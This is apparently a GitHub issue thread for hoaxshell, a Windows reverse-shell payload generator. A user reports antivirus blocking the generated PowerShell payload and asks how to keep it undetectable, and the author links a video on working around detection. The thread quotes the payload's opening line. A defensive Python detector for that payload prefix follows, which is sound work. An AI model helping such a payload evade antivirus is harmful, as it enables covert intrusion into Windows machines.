t3l3machus / hoaxshell

A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.
BSD 2-Clause "Simplified" License

Detected by antivirus!! #50

Closed Divinemonk closed 1 year ago

Divinemonk commented 1 year ago

I tried to run the powershell -e * generated by hoaxshell, but it returned this error:

At line:1 char:1
+ $s='*.*.*.*:8080';$i='c55b3450-03c33f0f-4e17c4ce';$p='http://';$v ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

The sole purpose of hoaxshell is being undetectable. Is there any way this could be fixed (or has antivirus now got a footprint of hoaxshell)!?

t3l3machus commented 1 year ago

Open source malware stuff will always end up being detected. Here's how to deal with it: https://www.youtube.com/watch?v=grSBdZdUya0

Divinemonk commented 1 year ago

Thank you :)
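
For defenders reading this thread: the error quoted in the first comment shows the start of the decoded `powershell -e` script, and that shape can also be hunted for in process-creation logs. The sketch below is an added example, not code from hoaxshell or from anyone in this issue; the regex is an assumption that covers only the prefix visible in that error (other builds may look different), and the sample command lines are constructed, using a documentation-range address.

```python
import base64
import re

# Shape of the prefix visible in the quoted error (assumption: only that line is known):
#   $s='<host>:<port>';$i='<8hex>-<8hex>-<8hex>';$p='http://';
PREFIX = re.compile(
    r"\$s='[^']{1,255}:\d{1,5}';"
    r"\$i='[0-9a-f]{8}-[0-9a-f]{8}-[0-9a-f]{8}';"
    r"\$p='https?://';",
    re.IGNORECASE,
)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent or undecodable."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        name = flag.lstrip("-/").lower()
        # powershell.exe accepts -e, -ec and any longer prefix of -EncodedCommand
        if flag[0] in "-/" and name and ("encodedcommand".startswith(name) or name == "ec"):
            try:
                # The argument is base64 over UTF-16LE text
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except ValueError:  # covers bad base64 and truncated UTF-16
                return None
    return None

def looks_like_quoted_payload(cmdline):
    """True when the decoded script starts like the payload quoted in the error."""
    script = decode_encoded_command(cmdline)
    return bool(script and PREFIX.search(script))

def flag_events(events):
    return [looks_like_quoted_payload(e) for e in events]

def _encode(script):
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed process command lines (not real telemetry); payload body deliberately omitted
SAMPLE_EVENTS = [
    "powershell -e " + _encode("$s='192.0.2.10:8080';$i='c55b3450-03c33f0f-4e17c4ce';$p='http://';"),
    "powershell.exe -NoProfile -EncodedCommand " + _encode("Get-ChildItem C:\\Temp"),
    "powershell -ExecutionPolicy Bypass -File backup.ps1",
]

if __name__ == "__main__":
    for event, hit in zip(SAMPLE_EVENTS, flag_events(SAMPLE_EVENTS)):
        print("ALERT" if hit else "ok   ", event[:60])
```

A string match like this complements the AMSI block shown in the error rather than replacing it, since it only sees payloads that keep this exact prefix.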